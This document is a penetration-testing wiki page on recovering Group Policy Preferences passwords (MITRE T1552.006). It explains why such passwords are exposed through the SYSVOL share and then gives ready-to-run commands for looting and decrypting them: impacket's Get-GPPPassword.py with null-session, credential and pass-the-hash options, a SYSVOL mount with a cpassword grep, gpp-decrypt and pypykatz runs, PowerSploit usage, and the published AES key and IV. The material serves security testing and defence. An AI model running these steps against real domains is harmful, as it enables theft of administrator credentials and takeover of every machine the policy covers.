Group Policy Preferences
MITRE ATT&CK™ Sub-technique T1552.006
Theory
Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.
- Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.
- Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).
- Issue 3: all Group Policies are stored in the Domain Controllers'
SYSVOLshare. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted.🤷♂
Practice
UNIX-like
Windows
From UNIX-like systems, the Get-GPPPassword.py (Python) script in the impacket examples can be used to remotely parse
.xml files and loot for passwords.1
# with a NULL session
2
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
3
4
# with cleartext credentials
5
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
6
7
# pass-the-hash
8
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
Copied!
Alternatively, searching for passwords can be done manually (or with Metasploit's
smb_enum_gpp module), however it requires mounting the SYSVOL share, which can't be done through a docker environment unless it's run with privileged rights.1
# create the target directory for the mount
2
sudo mkdir /tmp/sysvol
3
4
# mount the SYSVOL share
5
sudo mount\
6
-o domain='domain.local'\
7
-o username='someuser'\
8
-o password='password'\
9
-t cifs\
10
'//domain_controller/SYSVOL'\
11
/tmp/sysvol
12
13
# recursively look for "cpassword" in Group Policies
14
sudo grep -ria cpassword /tmp/sysvol/'domain.local'/Policies/ 2>/dev/null
15
16
# decrypt the string and recover the password
17
pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
18
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
Copied!
From Windows systems, the GPP password can only be recovered from an authenticated (i.e. domain user) context (see impersonation).
PowerSploit's Get-GPPPassword searches a Domain Controller's SYSVOL share
Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml and Drives.xml files and returns plaintext passwords1
Import-Module .\Get-GPPPassword.ps1
2
Get-GPPPassword
Copied!
This can also be achieved without tools, by "manually" looking for the
cpassword string in xml files and by then manually decrypting the matches.1
findstr /S cpassword %logonserver%\sysvol\*.xml
Copied!
The decryption process is as follows
1
1. decode from base64
2
2. decrypt from AES-256-CBC the following hex key/iv
3
Key : 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
4
IV : 0000000000000000000000000000000
5
3. decode from UTF-16LE
Copied!
Resources
Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
Active Directory Security
Group Policy Preferences and Getting Your Domain 0wned
Exploiting Windows Group Policy Preferences
[MS-GPPREF]: Password Encryption
docsmsft
Last modified 11mo ago